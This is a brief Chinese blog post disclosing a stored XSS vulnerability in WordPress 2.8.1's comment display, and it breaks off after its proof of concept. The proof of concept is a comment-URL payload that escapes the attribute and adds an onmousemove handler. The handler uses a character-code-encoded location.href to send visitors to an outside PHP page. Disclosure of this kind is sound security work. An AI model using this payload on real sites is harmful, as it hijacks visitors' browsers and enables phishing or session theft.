wordpress281评论显示xss漏洞
by kxlzx inbreak.net
ps:感谢鬼仔’blog,XEYE’s blog协助测试。
实际上是个XSS漏洞。
POC:
在评论的网址一栏,填写
http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs‘ onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,112);
[……]